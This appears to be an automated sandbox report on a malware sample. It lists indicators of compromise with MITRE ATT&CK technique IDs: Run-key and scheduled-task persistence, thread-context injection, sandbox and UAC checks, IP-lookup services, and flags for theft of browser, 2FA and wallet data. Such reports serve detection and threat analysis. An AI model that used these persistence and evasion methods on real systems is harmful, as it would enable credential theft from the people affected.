djvu | 8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	Qasuxyfaba.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PNQSsdFJvw.url	Adorarti.exe.com

Loads dropped DLL 44 IoCs

pid	Process
3564	setup_install.exe
3564	setup_install.exe
3564	setup_install.exe
3564	setup_install.exe
3564	setup_install.exe
1000	Thu21b93295136197.tmp
1000	Thu21b93295136197.tmp
1756	Thu214aaca5625.tmp
744	rundll32.exe
752	setup_2.tmp
5628	setup_2.tmp
6404	stats.tmp
6404	stats.tmp
6756	rundll32.exe
4592	Thu214ce31cede21.exe
4592	Thu214ce31cede21.exe
7560	Mortician.exe
7928	installer.exe
7928	installer.exe
7928	installer.exe
5732	MsiExec.exe
5732	MsiExec.exe
1772	rundll32.exe
3936	MsiExec.exe
3936	MsiExec.exe
3936	MsiExec.exe
3936	MsiExec.exe
3936	MsiExec.exe
3936	MsiExec.exe
3936	MsiExec.exe
3936	MsiExec.exe
3936	MsiExec.exe
3936	MsiExec.exe
7928	installer.exe
3936	MsiExec.exe
3936	MsiExec.exe
6092	MsiExec.exe
6092	MsiExec.exe
6092	MsiExec.exe
6092	MsiExec.exe
6092	MsiExec.exe
6092	MsiExec.exe
6092	MsiExec.exe
3936	MsiExec.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4336	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	6765595.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	tmp9A13_tmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	tmp9A13_tmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Laezhahaedewo.exe\""	46807GHF____.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\4d20de31-34ce-48a6-b190-0d1ae71ae326\\6232.exe\" --AutoStart"	6232.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 14 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Thu21b93295136197.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup_2.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	stats.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	installer.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Thu214aaca5625.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	tmp9A13_tmp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Leshilakuko.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Thu2156de5489c19.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	UltraMediaBurner.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	foradvertising.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ultramediaburner.tmp

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\E:	installer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 17 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
306	freegeoip.app
308	freegeoip.app
309	freegeoip.app
336	api.2ip.ua
666	ipinfo.io
30	ipinfo.io
118	ipinfo.io
349	api.2ip.ua
667	ipinfo.io
13	ip-api.com
337	api.2ip.ua
590	ipinfo.io
120	ipinfo.io
97	ip-api.com
311	freegeoip.app
589	ipinfo.io
27	ipinfo.io

Drops file in System32 directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Services	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Time Trigger Task	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 4F4B4CF3543A3305	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2572 set thread context of 5176	2572	svchost.exe	137
PID 6792 set thread context of 7832	6792	services64.exe	256
PID 6700 set thread context of 6784	6700	Services.exe	263
PID 6928 set thread context of 5280	6928	6232.exe	268

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-9M2KN.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\Windows Portable Devices\Laezhahaedewo.exe	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files\MSBuild\KBGWBIPSDD\ultramediaburner.exe	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url	Setup.exe
File created	C:\Program Files (x86)\FarLabUninstaller\is-7R7QF.tmp	setup_2.tmp
File created	C:\Program Files\MSBuild\KBGWBIPSDD\ultramediaburner.exe.config	46807GHF____.exe
File created	C:\Program Files (x86)\Windows Portable Devices\Laezhahaedewo.exe.config	46807GHF____.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-748SI.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe

Drops file in Windows directory 37 IoCs

description	ioc	Process
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\Installer\f75ab28.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAF0F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID41C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID546.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID6CD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAE53.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB07B.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID10C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID1D8.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSIAFDC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC1B3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAFAC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC465.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID950.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	Explorer.EXE
File opened for modification	C:\Windows\Installer\MSIC28F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC503.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIACFA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC079.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICD42.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\Installer\f75ab25.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f75ab25.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID340.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC32C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSIB03B.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

pid	pid_target	Process	procid_target
2276	4084	WerFault.exe	91
4296	4084	WerFault.exe	91
5368	4084	WerFault.exe	91
5752	3424	WerFault.exe	119
5744	4084	WerFault.exe	91
6084	3424	WerFault.exe	119
2380	3424	WerFault.exe	119
5352	3424	WerFault.exe	119
5784	4432	WerFault.exe	125
4128	3424	WerFault.exe	119
4296	4084	WerFault.exe	91
5272	3424	WerFault.exe	119
1816	3424	WerFault.exe	119
1076	4084	WerFault.exe	91
6380	4084	WerFault.exe	91
6896	1988	WerFault.exe	109

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu2164f292a11ce.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu2164f292a11ce.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu2164f292a11ce.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Thu214ce31cede21.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Thu214ce31cede21.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
4788	schtasks.exe
7136	schtasks.exe
992	schtasks.exe
4336	schtasks.exe
6440	schtasks.exe
5376	schtasks.exe
5080	schtasks.exe
6880	schtasks.exe
5224	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
4240	timeout.exe
2692	timeout.exe
4240	timeout.exe

Kills process with taskkill 7 IoCs

evasion

pid	Process
7312	taskkill.exe
5796	taskkill.exe
5844	taskkill.exe
5264	taskkill.exe
6640	taskkill.exe
7636	taskkill.exe
4164	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe

Modifies data under HKEY_USERS 23 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{LJDG576V-FJ1Y-M3DK-T0ZJ-KIMQL256VU13}\1 = "5632"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = b9d9ec28329fd701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{0D4231CA-E1EB-46C4-9C29-05BD9C69AE52}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
